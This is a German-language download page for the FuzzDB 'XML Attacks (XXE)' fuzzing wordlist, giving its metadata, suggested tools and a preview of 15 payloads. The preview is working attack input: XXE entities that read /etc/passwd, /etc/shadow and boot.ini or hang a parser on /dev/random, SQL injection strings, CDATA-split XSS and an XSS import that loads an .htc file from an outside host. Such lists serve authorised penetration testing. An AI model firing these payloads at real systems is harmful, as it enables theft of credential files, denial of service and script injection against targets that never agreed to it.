FuzzDB XML Attacks (XXE)
XML-Angriffs-Payloads, einschließlich XXE-External-Entity-Dateilesevorgängen (/etc/passwd, boot.ini, /dev/random-DoS), CDATA-umschlossener SQLi/XSS und MS-Data-Island-Injektionen.
- Größe
- 2.9 KB
- Kategorie
- Fuzzing
- Quelle
- fuzzdb-project/fuzzdb
- Lizenz
- GPLv2
- Empfohlene Tools
- burpffufwfuzz
Vorschau
Die ersten 15 Einträge. Lade die vollständige Liste (2.9 KB) herunter oder kopiere sie über die Schaltflächen oben.
-
' or ''='
' or '1'='1
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://xss.rocks/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://xss.rocks/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
$XML-Angriffs-Payloads, einschließlich XXE-External-Entity-Dateilesevorgängen (/etc/passwd, boot.ini, /dev/random-DoS), CDATA-umschlossener SQLi/XSS und MS-Data-Island-Injektionen.
Diese Liste ist auf Input-Fuzzing und Schwachstellensuche ausgerichtet. Sie umfasst rund 2.9 KB und harmoniert gut mit Tools wie burp, ffuf, wfuzz. Wählen Sie die kleinste Liste, die zu Ihrem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeiten bieten, bei denen Geschwindigkeit weniger eine Einschränkung darstellt.
Sie können die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in
Ihre Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt
aus ihrer Upstream-Quelle auf GitHub ausgeliefert.
Bezogen von fuzzdb-project/fuzzdb und vertrieben unter GPLv2. Verwenden Sie Wortlisten nur gegen Systeme, für deren Test Sie ausdrücklich autorisiert sind.